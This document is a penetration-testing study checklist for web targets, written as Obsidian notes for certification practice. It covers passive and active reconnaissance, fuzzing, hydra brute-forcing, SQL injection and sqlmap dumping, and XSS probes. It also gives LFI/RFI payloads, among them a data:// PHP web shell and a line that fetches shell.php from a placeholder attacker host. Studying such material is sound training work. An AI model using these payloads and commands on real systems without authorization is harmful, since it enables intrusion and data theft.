# Passive Recon
### 1. Review public DNS records for the domain and associated subdomains
- [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/2 - DNS Overview|DNS Overview]]
- [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/3 - Digging DNS|Digging DNS]]
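Example `dig` queries (domain and nameserver are placeholders):
```bash
# common record types
dig example.com A +short
dig example.com MX +short
dig example.com TXT +short
dig example.com NS +short
# attempt a zone transfer against each authoritative NS (usually refused)
dig axfr example.com @ns1.example.com
```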
### 2. Review certificates and other info for domain and associated subdomains
- [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/5 - Certificate Transparency Logs|Certificate Transparency Logs]]
- [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/8 - Search Engine Discovery|Search Engine Discovery]]
- [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/9 - Web Archives|Web Archives]]
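Quick subdomain pull from Certificate Transparency logs via crt.sh (domain is a placeholder; requires `jq`; `%25` is a URL-encoded wildcard):
```bash
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sort -u
```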
### 3. Automated Passive Scans
> [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/10 - Recon Automation|Recon Automation]]
- Run `FinalRecon`
- Run `Recon-ng`
- Run `theHarvester`
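Example invocations (domain is a placeholder; flags may differ between tool versions):
```bash
theHarvester -d example.com -b all           # emails, hosts, subdomains from public sources
finalrecon --full --url https://example.com  # run all FinalRecon modules
recon-ng -w example_workspace                # then add the domain and run modules interactively
```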
---
# Active Recon
### 1. Add domain and associated subdomains to `/etc/hosts` for proper name resolution
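For example (IP and hostnames are placeholders):
```bash
echo '10.129.10.10 example.htb www.example.htb' | sudo tee -a /etc/hosts
ping -c 1 example.htb  # verify resolution
```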
### 2. Try `index.html` and `index.php` to identify which common extensions the server uses
### 3. Web fuzzing
- First, perform directory fuzzing
- Start with `raft-medium-directories.txt` (~30K entries), then `directory-list-2.3-medium.txt` (~220K entries)
- If many directories are found, use `feroxbuster` for recursive fuzzing
- Second, perform extension fuzzing after a directory is found
- Third, if extension found, fuzz for pages with extension appended
- Fourth, perform subdomain/vhost fuzzing
```bash
# dir fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://<target_FQDN/IP>:<port>/FUZZ -c -ic #30K entries
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target_FQDN/IP>:<port>/FUZZ -c -ic #220K entries
# follow-up recursive dir fuzzing with feroxbuster
feroxbuster -u http://<target_FQDN/IP>:<port> #uses raft-medium-directories by default
feroxbuster -u https://<target_FQDN/IP>:<port> -k -x php #use -k for https and -x to specify extension
# extension fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -u http://<target_FQDN/IP>:<port>/directory/<page>FUZZ -c -ic
# page fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://<target_FQDN/IP>:<port>/directory/FUZZ.php -c -ic
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target_FQDN/IP>:<port>/directory/FUZZ.php -c -ic
# parameter fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://<target_FQDN/IP>:<port>/directory?FUZZ= -c -ic
# DNS fuzzing (good for AD recon); gobuster dns takes a bare domain, no scheme or port
gobuster dns -d <target_domain> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
# subdomain fuzzing
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.inlanefreight.htb -c -ic
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://FUZZ.inlanefreight.htb -c -ic
# vhost fuzzing
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://academy.htb/ -H 'Host: FUZZ.academy.htb' -c -ic
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://academy.htb/ -H 'Host: FUZZ.academy.htb' -c -ic
```
### 4. Review `robots.txt` and `sitemap.xml`
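Both files live in the webroot and can be fetched directly (target is a placeholder):
```bash
curl -s http://example.htb/robots.txt   #disallowed paths often reveal hidden dirs
curl -s http://example.htb/sitemap.xml
curl -s http://example.htb/.well-known/security.txt
```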
### 5. Crawl webserver for all links
> [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/7 - Crawling, robots.txt, .well-known URIs|Crawling]]
- Use `scrapy` or `reconspider.py`
### 6. Review page source of all discovered pages for sensitive info and potential usernames
### 7. Request a nonexistent page to trigger server errors that may reveal the tech stack
### 8. Attempt to fingerprint webserver tech stack
- Use `whatweb` command line tool to discover webserver tech stack
- Scan webserver with `nikto` to discover webserver tech stack and potential vulns
- Use `wappalyzer` browser extension to discover webserver tech stack
- Use `wafw00f` to discover WAF
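Example fingerprinting commands (target is a placeholder):
```bash
whatweb -a 3 http://example.htb  #aggression level 3
nikto -h http://example.htb      #also flags common misconfigs/vulns
wafw00f http://example.htb       #WAF detection
curl -I http://example.htb       #check Server and X-Powered-By headers
```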
### 9. Perform web app enum
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/2 - Application Discovery & Enum|General Web Application Discovery & Enum]]
- Run `eyewitness` or `aquatone`
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/3 - WordPress - Discovery & Enum|WordPress]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/5 - Joomla - Discovery & Enum| Joomla]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/7 - Drupal - Discovery & Enum|Drupal]]
- [[5 - CPTS/4 - Skills Assessments/Linux Privsec/2 - Tomcat Enum|Tomcat]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/11 - Jenkins - Discovery & Enum|Jenkins]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/13 - Splunk - Discovery & Enum|Splunk]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/15 - PRTG Network Monitor|PRTG Network Monitor]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/16 - osTicket|osTicket]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/17 - Gitlab - Discovery & Enum|Gitlab]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/19 - Attacking Tomcat CGI|Tomcat CGI]] & [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/20 - Attacking CGI Apps|CGI Apps]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/25 - IIS Tilde Enum|IIS Tilde]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/23 - ColdFusion - Discovery & Enum|ColdFusion]]
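`eyewitness` and `aquatone` (mentioned above) can screenshot many discovered hosts at once (file names are placeholders):
```bash
eyewitness --web -f urls.txt -d screens/  #one URL per line in urls.txt
cat hosts.txt | aquatone                  #reads hosts/URLs from stdin
```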
### 10. Check for vulns in webserver tech stack and web apps versions
- Use both `searchsploit` AND Google
- Document discovered vulns
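Example searchsploit usage (product/version and EDB-ID are placeholders):
```bash
searchsploit apache 2.4.49
searchsploit -m <EDB-ID>  #mirror an exploit locally
searchsploit -u           #update the local exploit-db copy
```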
### 11. Look for login pages to test with default or weak creds
- Try **DEFAULT or COMMON** creds before attempting to brute force
- [[5 - CPTS/2 - Checklists/1 - External Enum/3 - Default Creds Attack Sequence|Default Creds]]
- [[5 - CPTS/3 - CPTS Notes/14 - Login Brute Forcing/6 - Hydra - Basic HTTP Auth|Hydra - Basic HTTP Auth]]
- [[5 - CPTS/3 - CPTS Notes/14 - Login Brute Forcing/7 - Hydra - Login & Security Forms|Hydra - Login & Security Forms]]
- When brute forcing, start with a small list before using `/opt/rockyou.txt`
- Notes:
- Check for password reset or recovery mechanisms
- Review cookies and sessions
- Test for session fixation or missing CSRF protections
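Example hydra invocations (target, form path, field names, and failure string are placeholders):
```bash
# basic HTTP auth
hydra -l admin -P <wordlist> example.htb http-get /admin/
# login form (F= marks the failed-login string in the response)
hydra -l admin -P <wordlist> example.htb http-post-form "/login.php:username=^USER^&password=^PASS^:F=Invalid credentials"
```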
### 12. Identify input fields to submit data
> [[5 - CPTS/3 - CPTS Notes/12 - Web Proxies/2 - Intercepting Requests|Intercepting Requests]]
- Intercept request with `burp` and review responses
### 13. Test submitting data to EVERY input field
- Does input appear to be used by a system command like `ping` -> Think: **Command Injection**
- Does a file upload mechanism exist? -> Think: **File Upload Attacks**
- Does the webserver appear to be populating data from a db (e.g., username and password fields)? -> Think: **SQLi**
- Test simple injection: `' OR 1=1 --`
- Test UNION injection: `' UNION SELECT NULL,NULL--`
```bash
#Example SQLi payloads for username field
admin'
admin'-- -
admin' OR 1=1
admin' OR 1=1-- -
#Example UNION payloads
test' UNION SELECT 1,2;-- -
test' UNION SELECT 1,2,3,4,5,6,7;-- -
test' UNION SELECT 1,@@version,2,3,4,5,6;-- - #once we determine the number of columns, determine the injectable column
```
- Do GET parameters appear to be pulling local files on webserver? -> Think: **Path Traversal and File Inclusion**
- Fuzz GET and POST parameters
- [[5 - CPTS/3 - CPTS Notes/13 - Web Fuzzing with Ffuf/6 - Parameter Fuzzing| Parameter Fuzzing]]
- Try `php://filter` for source code disclosure
- [[5 - CPTS/3 - CPTS Notes/18 - File Inclusion/4 - PHP Filters|PHP Filters]]
- Try `data://`, `php://input`, and `expect://` for RCE
- [[5 - CPTS/3 - CPTS Notes/18 - File Inclusion/5 - PHP Wrappers|PHP Wrappers]]
- Try [[5 - CPTS/3 - CPTS Notes/18 - File Inclusion/6 - RFI|RFI]]
- Try [[5 - CPTS/3 - CPTS Notes/18 - File Inclusion/7 - LFI-enabled File Upload Attacks|LFI-enabled File Upload Attacks]]
- Try [[5 - CPTS/3 - CPTS Notes/18 - File Inclusion/8 - Log Poisoning|Log Poisoning]]
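Example wrapper payloads (`?page=` is a hypothetical vulnerable parameter; adjust to the target):
```bash
#source disclosure via php://filter (decode the response with base64 -d)
http://example.htb/index.php?page=php://filter/convert.base64-encode/resource=config
#RCE via data:// wrapper (base64 of <?php system($_GET['cmd']); ?>)
http://example.htb/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2B&cmd=id
#RCE via expect:// (requires the expect extension)
http://example.htb/index.php?page=expect://id
#RFI (requires allow_url_include)
http://example.htb/index.php?page=http://<attacker_IP>/shell.php
```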
- Is there an API, UID, or other sequence number present in accounts, pages, etc.? -> Think: **IDOR**
- Are XML or SVG or WAV inputs accepted? -> Think: **XXE**
- Is basic HTTP auth or a security message present? -> Think: **Verb Tampering**
- Test all input fields for XSS
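Common first-pass XSS probes (harmless `alert` payloads):
```bash
<script>alert(window.origin)</script>
<img src=x onerror=alert(1)>
"><svg onload=alert(1)>
```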
### 14. Try to read the top-level webserver config file, then individual PHP files
- This provides lots of context as to how the webserver is running
- May be possible via LFI or SQLi
#### Apache
```bash
/etc/apache2/apache2.conf #default apache config loc
/etc/apache2/sites-available/ #vhost config files
/etc/apache2/sites-available/000-default.conf
/var/www/html/ #default apache webroot (Debian and RHEL)
/etc/httpd/conf/httpd.conf #default apache config loc on RHEL
```
#### NGINX
```bash
/etc/nginx/nginx.conf #default nginx config loc
/etc/nginx/sites-available/ #vhost config files
/etc/nginx/sites-enabled/default #vhost config files
/usr/share/nginx/html/ #default nginx webroot for RHEL
/var/www/html #nginx webroot for some installations
```
#### XAMPP & IIS
```powershell
c:\xampp\apache\conf\ #default xampp apache config loc
c:\xampp\htdocs\ #default xampp webroot
%windir%\System32\inetsrv\config #default IIS config dir
%windir%\System32\inetsrv\config\applicationHost.config #main IIS config file
%windir%\System32\inetsrv\config\administration.config #IIS management config
c:\inetpub\wwwroot #default IIS webroot
c:\inetpub\wwwroot\web.config
```
### 15. If the webserver exposes an API or WebSocket endpoint, check GET and POST requests for potential SQLi with `sqlmap`
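For example, save the intercepted request from burp to a file and let sqlmap test every parameter (filenames and targets are placeholders; adjust level/risk as needed):
```bash
sqlmap -r request.txt --batch                  #test all parameters in the saved request
sqlmap -u 'http://example.htb/api/items?id=1' --batch --level=3 --risk=2
sqlmap -r request.txt --batch --dump -T users  #dump a table once injection is confirmed
```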